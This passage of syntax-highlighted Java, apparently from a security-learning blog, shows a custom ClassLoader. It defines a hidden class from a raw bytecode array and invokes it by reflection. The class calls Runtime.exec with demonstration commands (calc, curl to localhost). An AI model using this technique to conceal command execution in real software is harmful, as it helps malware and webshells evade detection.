class="number">0</span>, <span class="number">4</span>, <span class="number">97</span>, <span class="number">114</span>, <span class="number">103</span>, <span class="number">115</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">18</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">59</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">7</span>, <span class="number">99</span>, <span class="number">111</span>, <span class="number">109</span>, <span class="number">109</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">100</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">6</span>, <span class="number">111</span>, <span class="number">115</span>, <span class="number">78</span>, <span class="number">97</span>, <span class="number">109</span>, <span class="number">101</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">13</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">97</span>, <span class="number">99</span>, <span class="number">107</span>, <span class="number">77</span>, <span class="number">97</span>, <span class="number">112</span>, <span class="number">84</span>, <span class="number">97</span>, <span class="number">98</span>, <span class="number">108</span>, <span class="number">101</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">76</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">72</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">16</span>, <span class="number">77</span>, <span class="number">101</span>, <span class="number">116</span>, <span class="number">104</span>, <span class="number">111</span>, <span class="number">100</span>, <span class="number">80</span>, <span class="number">97</span>, <span class="number">114</span>, <span class="number">97</span>, <span class="number">109</span>, <span class="number">101</span>, <span class="number">116</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">115</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">10</span>, <span class="number">83</span>, <span class="number">111</span>, <span class="number">117</span>, <span class="number">114</span>, <span class="number">99</span>, <span class="number">101</span>, <span class="number">70</span>, <span class="number">105</span>, <span class="number">108</span>, <span class="number">101</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">12</span>, <span class="number">67</span>, <span class="number">111</span>, <span class="number">109</span>, <span class="number">109</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">100</span>, <span class="number">46</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">21</span>, <span class="number">0</span>, <span class="number">22</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">7</span>, <span class="number">111</span>, <span class="number">115</span>, <span class="number">46</span>, <span class="number">110</span>, <span class="number">97</span>, <span class="number">109</span>, <span class="number">101</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">77</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">78</span>, <span class="number">0</span>, <span class="number">79</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">7</span>, <span class="number">87</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">100</span>, <span class="number">111</span>, <span class="number">119</span>, <span class="number">115</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">76</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">80</span>, <span class="number">0</span>, <span class="number">81</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">22</span>, <span class="number">99</span>, <span class="number">97</span>, <span class="number">108</span>, <span class="number">99</span>, <span class="number">32</span>, <span class="number">49</span>, <span class="number">50</span>, <span class="number">51</span>, <span class="number">52</span>, <span class="number">53</span>, <span class="number">54</span>, <span class="number">55</span>, <span class="number">56</span>, <span class="number">57</span>, <span class="number">48</span>, <span class="number">49</span>, <span class="number">50</span>, <span class="number">51</span>, <span class="number">52</span>, <span class="number">53</span>, <span class="number">54</span>, <span class="number">55</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">5</span>, <span class="number">76</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">117</span>, <span class="number">120</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">20</span>, <span class="number">99</span>, <span class="number">117</span>, <span class="number">114</span>, <span class="number">108</span>, <span class="number">32</span>, <span class="number">108</span>, <span class="number">111</span>, <span class="number">99</span>, <span class="number">97</span>, <span class="number">108</span>, <span class="number">104</span>, <span class="number">111</span>, <span class="number">115</span>, <span class="number">116</span>, <span class="number">58</span>, <span class="number">57</span>, <span class="number">57</span>, <span class="number">57</span>, <span class="number">57</span>, <span class="number">47</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">82</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">83</span>, <span class="number">0</span>, <span class="number">84</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">85</span>, <span class="number">0</span>, <span class="number">86</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">87</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">88</span>, <span class="number">0</span>, <span class="number">89</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">25</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">73</span>, <span class="number">110</span>, <span class="number">112</span>, <span class="number">117</span>, <span class="number">116</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">109</span>, <span class="number">82</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">100</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">90</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">91</span>, <span class="number">0</span>, <span class="number">92</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">21</span>, <span class="number">0</span>, <span class="number">93</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">22</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">66</span>, <span class="number">117</span>, <span class="number">102</span>, <span class="number">102</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">101</span>, <span class="number">100</span>, <span class="number">82</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">100</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">21</span>, <span class="number">0</span>, <span class="number">94</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">19</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">73</span>, <span class="number">79</span>, <span class="number">69</span>, <span class="number">120</span>, <span class="number">99</span>, <span class="number">101</span>, <span class="number">112</span>, <span class="number">116</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">110</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">95</span>, <span class="number">0</span>, <span class="number">22</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">23</span>, <span class="number">99</span>, <span class="number">111</span>, <span class="number">109</span>, <span class="number">47</span>, <span class="number">99</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">115</span>, <span class="number">115</span>, <span class="number">108</span>, <span class="number">111</span>, <span class="number">97</span>, <span class="number">100</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">47</span>, <span class="number">67</span>, <span class="number">111</span>, <span class="number">109</span>, <span class="number">109</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">100</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">16</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">79</span>, <span class="number">98</span>, <span class="number">106</span>, <span class="number">101</span>, <span class="number">99</span>, <span class="number">116</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">16</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">16</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">83</span>, <span class="number">121</span>, <span class="number">115</span>, <span class="number">116</span>, <span class="number">101</span>, <span class="number">109</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">11</span>, <span class="number">103</span>, <span class="number">101</span>, <span class="number">116</span>, <span class="number">80</span>, <span class="number">114</span>, <span class="number">111</span>, <span class="number">112</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">116</span>, <span class="number">121</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">38</span>, <span class="number">40</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">59</span>, <span class="number">41</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">59</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">10</span>, <span class="number">115</span>, <span class="number">116</span>, <span class="number">97</span>, <span class="number">114</span>, <span class="number">116</span>, <span class="number">115</span>, <span class="number">87</span>, <span class="number">105</span>, <span class="number">116</span>, <span class="number">104</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">21</span>, <span class="number">40</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">59</span>, <span class="number">41</span>, <span class="number">90</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">17</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">82</span>, <span class="number">117</span>, <span class="number">110</span>, <span class="number">116</span>, <span class="number">105</span>, <span class="number">109</span>, <span class="number">101</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">10</span>, <span class="number">103</span>, <span class="number">101</span>, <span class="number">116</span>, <span class="number">82</span>, <span class="number">117</span>, <span class="number">110</span>, <span class="number">116</span>, <span class="number">105</span>, <span class="number">109</span>, <span class="number">101</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">21</span>, <span class="number">40</span>, <span class="number">41</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">82</span>, <span class="number">117</span>, <span class="number">110</span>, <span class="number">116</span>, <span class="number">105</span>, <span class="number">109</span>, <span class="number">101</span>, <span class="number">59</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">101</span>, <span class="number">120</span>, <span class="number">101</span>, <span class="number">99</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">39</span>, <span class="number">40</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">59</span>, <span class="number">41</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">80</span>, <span class="number">114</span>, <span class="number">111</span>, <span class="number">99</span>, <span class="number">101</span>, <span class="number">115</span>, <span class="number">115</span>, <span class="number">59</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">17</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">80</span>, <span class="number">114</span>, <span class="number">111</span>, <span class="number">99</span>, <span class="number">101</span>, <span class="number">115</span>, <span class="number">115</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">14</span>, <span class="number">103</span>, <span class="number">101</span>, <span class="number">116</span>, <span class="number">73</span>, <span class="number">110</span>, <span class="number">112</span>, <span class="number">117</span>, <span class="number">116</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">109</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">23</span>, <span class="number">40</span>, <span class="number">41</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">73</span>, <span class="number">110</span>, <span class="number">112</span>, <span class="number">117</span>, <span class="number">116</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">109</span>, <span class="number">59</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">33</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">110</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">99</span>, <span class="number">104</span>, <span class="number">97</span>, <span class="number">114</span>, <span class="number">115</span>, <span class="number">101</span>, <span class="number">116</span>, <span class="number">47</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">100</span>, <span class="number">97</span>, <span class="number">114</span>, <span class="number">100</span>, <span class="number">67</span>, <span class="number">104</span>, <span class="number">97</span>, <span class="number">114</span>, <span class="number">115</span>, <span class="number">101</span>, <span class="number">116</span>, <span class="number">115</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">5</span>, <span class="number">85</span>, <span class="number">84</span>, <span class="number">70</span>, <span class="number">95</span>, <span class="number">56</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">26</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">110</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">99</span>, <span class="number">104</span>, <span class="number">97</span>, <span class="number">114</span>, <span class="number">115</span>, <span class="number">101</span>, <span class="number">116</span>, <span class="number">47</span>, <span class="number">67</span>, <span class="number">104</span>, <span class="number">97</span>, <span class="number">114</span>, <span class="number">115</span>, <span class="number">101</span>, <span class="number">116</span>, <span class="number">59</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">50</span>, <span class="number">40</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">73</span>, <span class="number">110</span>, <span class="number">112</span>, <span class="number">117</span>, <span class="number">116</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">109</span>, <span class="number">59</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">110</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">99</span>, <span class="number">104</span>, <span class="number">97</span>, <span class="number">114</span>, <span class="number">115</span>, <span class="number">101</span>, <span class="number">116</span>, <span class="number">47</span>, <span class="number">67</span>, <span class="number">104</span>, <span class="number">97</span>, <span class="number">114</span>, <span class="number">115</span>, <span class="number">101</span>, <span class="number">116</span>, <span class="number">59</span>, <span class="number">41</span>, <span class="number">86</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">19</span>, <span class="number">40</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">82</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">100</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">59</span>, <span class="number">41</span>, <span class="number">86</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">15</span>, <span class="number">112</span>, <span class="number">114</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">116</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">97</span>, <span class="number">99</span>, <span class="number">107</span>, <span class="number">84</span>, <span class="number">114</span>, <span class="number">97</span>, <span class="number">99</span>, <span class="number">101</span>, <span class="number">0</span>, <span class="number">33</span>, <span class="number">0</span>, <span class="number">19</span>, <span class="number">0</span>, <span class="number">20</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">21</span>, <span class="number">0</span>, <span class="number">22</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">23</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">47</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">5</span>, <span class="number">42</span>, -<span class="number">73</span>, <span class="number">0</span>, <span class="number">1</span>, -<span class="number">79</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>, <span class="number">24</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">6</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">9</span>, <span class="number">0</span>, <span class="number">25</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">5</span>, <span class="number">0</span>, <span class="number">26</span>, <span class="number">0</span>, <span class="number">27</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">28</span>, <span class="number">0</span>, <span class="number">29</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>, <span class="number">23</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">61</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">0</span>, <span class="number">9</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">98</span>, <span class="number">43</span>, <span class="number">77</span>, <span class="number">18</span>, <span class="number">2</span>, -<span class="number">72</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">78</span>, <span class="number">45</span>, <span class="number">18</span>, <span class="number">4</span>, -<span class="number">74</span>, <span class="number">0</span>, <span class="number">5</span>, -<span class="number">103</span>, <span class="number">0</span>, <span class="number">9</span>, <span class="number">18</span>, <span class="number">6</span>, <span class="number">77</span>, -<span class="number">89</span>, <span class="number">0</span>, <span class="number">76</span>, <span class="number">45</span>, <span class="number">18</span>, <span class="number">7</span>, -<span class="number">74</span>, <span class="number">0</span>, <span class="number">5</span>, -<span class="number">103</span>, <span class="number">0</span>, <span class="number">9</span>, <span class="number">18</span>, <span class="number">8</span>, <span class="number">77</span>, -<span class="number">89</span>, <span class="number">0</span>, <span class="number">61</span>, -<span class="number">72</span>, <span class="number">0</span>, <span class="number">9</span>, <span class="number">44</span>, -<span class="number">74</span>, <span class="number">0</span>, <span class="number">10</span>, <span class="number">58</span>, <span class="number">4</span>, <span class="number">25</span>, <span class="number">4</span>, -<span class="number">74</span>, <span class="number">0</span>, <span class="number">11</span>, <span class="number">58</span>, <span class="number">5</span>, <span class="number">25</span>, <span class="number">4</span>, -<span class="number">74</span>, <span class="number">0</span>, <span class="number">11</span>, <span class="number">58</span>, <span class="number">6</span>, -<span class="number">69</span>, <span class="number">0</span>, <span class="number">12</span>, <span class="number">89</span>, <span class="number">25</span>, <span class="number">6</span>, -<span class="number">78</span>, <span class="number">0</span>, <span class="number">13</span>, -<span class="number">73</span>, <span class="number">0</span>, <span class="number">14</span>, <span class="number">58</span>, <span class="number">7</span>, -<span class="number">69</span>, <span class="number">0</span>, <span class="number">15</span>, <span class="number">89</span>, <span class="number">25</span>, <span class="number">7</span>, -<span class="number">73</span>, <span class="number">0</span>, <span class="number">16</span>, <span class="number">58</span>, <span class="number">8</span>, <span class="number">25</span>, <span class="number">8</span>, -<span class="number">80</span>, <span class="number">58</span>, <span class="number">4</span>, <span class="number">25</span>, <span class="number">4</span>, -<span class="number">74</span>, <span class="number">0</span>, <span class="number">18</span>, <span class="number">1</span>, -<span class="number">80</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">38</span>, <span class="number">0</span>, <span class="number">88</span>, <span class="number">0</span>, <span class="number">89</span>, <span class="number">0</span>, <span class="number">17</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">0</span>, <span class="number">24</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">62</span>, <span class="number">0</span>, <span class="number">15</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">11</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">8</span>, <span class="number">0</span>, <span class="number">14</span>, <span class="number">0</span>, <span class="number">17</span>, <span class="number">0</span>, <span class="number">15</span>, <span class="number">0</span>, <span class="number">23</span>, <span class="number">0</span>, <span class="number">17</span>, <span class="number">0</span>, <span class="number">32</span>, <span class="number">0</span>, <span class="number">18</span>, <span class="number">0</span>, <span class="number">38</span>, <span class="number">0</span>, <span class="number">21</span>, <span class="number">0</span>, <span class="number">47</span>, <span class="number">0</span>, <span class="number">23</span>, <span class="number">0</span>, <span class="number">54</span>, <span class="number">0</span>, <span class="number">25</span>, <span class="number">0</span>, <span class="number">61</span>, <span class="number">0</span>, <span class="number">27</span>, <span class="number">0</span>, <span class="number">75</span>, <span class="number">0</span>, <span class="number">29</span>, <span class="number">0</span>, <span class="number">86</span>, <span class="number">0</span>, <span class="number">31</span>, <span class="number">0</span>, <span class="number">89</span>, <span class="number">0</span>, <span class="number">33</span>, <span class="number">0</span>, <span class="number">91</span>, <span class="number">0</span>, <span class="number">34</span>, <span class="number">0</span>, <span class="number">96</span>, <span class="number">0</span>, <span class="number">38</span>, <span class="number">0</span>, <span class="number">25</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">102</span>, <span class="number">0</span>, <span class="number">10</span>, <span class="number">0</span>, <span class="number">47</span>, <span class="number">0</span>, <span class="number">42</span>, <span class="number">0</span>, <span class="number">30</span>, <span class="number">0</span>, <span class="number">31</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">0</span>, <span class="number">54</span>, <span class="number">0</span>, <span class="number">35</span>, <span class="number">0</span>, <span class="number">32</span>, <span class="number">0</span>, <span class="number">33</span>, <span class="number">0</span>, <span class="number">5</span>, <span class="number">0</span>, <span class="number">61</span>, <span class="number">0</span>, <span class="number">28</span>, <span class="number">0</span>, <span class="number">34</span>, <span class="number">0</span>, <span class="number">33</span>, <span class="number">0</span>, <span class="number">6</span>, <span class="number">0</span>, <span class="number">75</span>, <span class="number">0</span>, <span class="number">14</span>, <span class="number">0</span>, <span class="number">35</span>, <span class="number">0</span>, <span class="number">36</span>, <span class="number">0</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">86</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">0</span>, <span class="number">37</span>, <span class="number">0</span>, <span class="number">38</span>, <span class="number">0</span>, <span class="number">8</span>, <span class="number">0</span>, <span class="number">91</span>, <span class="number">0</span>, <span class="number">5</span>, <span class="number">0</span>, <span class="number">39</span>, <span class="number">0</span>, <span class="number">40</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">98</span>, <span class="number">0</span>, <span class="number">26</span>, <span class="number">0</span>, <span class="number">27</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">98</span>, <span class="number">0</span>, <span class="number">41</span>, <span class="number">0</span>, <span class="number">42</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>, <span class="number">96</span>, <span class="number">0</span>, <span class="number">43</span>, <span class="number">0</span>, <span class="number">42</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>, <span class="number">8</span>, <span class="number">0</span>, <span class="number">90</span>, <span class="number">0</span>, <span class="number">44</span>, <span class="number">0</span>, <span class="number">42</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">0</span>, <span class="number">45</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">17</span>, <span class="number">0</span>, <span class="number">4</span>, -<span class="number">3</span>, <span class="number">0</span>, <span class="number">23</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">46</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">46</span>, <span class="number">14</span>, <span class="number">114</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">47</span>, <span class="number">6</span>, <span class="number">0</span>, <span class="number">48</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">5</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">41</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">49</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>, <span class="number">50</span></span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> Class&lt;?&gt; findClass(String name) <span class="keyword">throws</span> ClassNotFoundException &#123;</span><br><span class="line">        <span class="comment">// 只处理 x类</span></span><br><span class="line">        <span class="keyword">if</span> (name.equals(TEST_CLASS_NAME)) &#123;</span><br><span class="line">            <span class="comment">// 调用JVM的native去加载 x类</span></span><br><span class="line">            <span class="keyword">return</span> defineClass(TEST_CLASS_NAME, TEST_CLASS_BYTES, <span class="number">0</span>, TEST_CLASS_BYTES.length);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">super</span>.findClass(name);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">        <span class="comment">// 创建自定义的classloader</span></span><br><span class="line">        <span class="type">ZeoClassLoader</span> <span class="variable">loader</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ZeoClassLoader</span>();</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="comment">// 使用自定义的类加载器加载x类</span></span><br><span class="line">            <span class="type">Class</span> <span class="variable">testClass</span> <span class="operator">=</span> loader.loadClass(TEST_CLASS_NAME);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 获取构造方法</span></span><br><span class="line">            <span class="type">Constructor</span> <span class="variable">constructor</span> <span class="operator">=</span> testClass.getDeclaredConstructor();</span><br><span class="line">            constructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 反射实例化，等价于 Command t = new Command();</span></span><br><span class="line">            <span class="type">Object</span> <span class="variable">runtimeInstance</span> <span class="operator">=</span> constructor.newInstance();</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 反射获取 execute 方法</span></span><br><span class="line">            <span class="type">Method</span> <span class="variable">method</span> <span 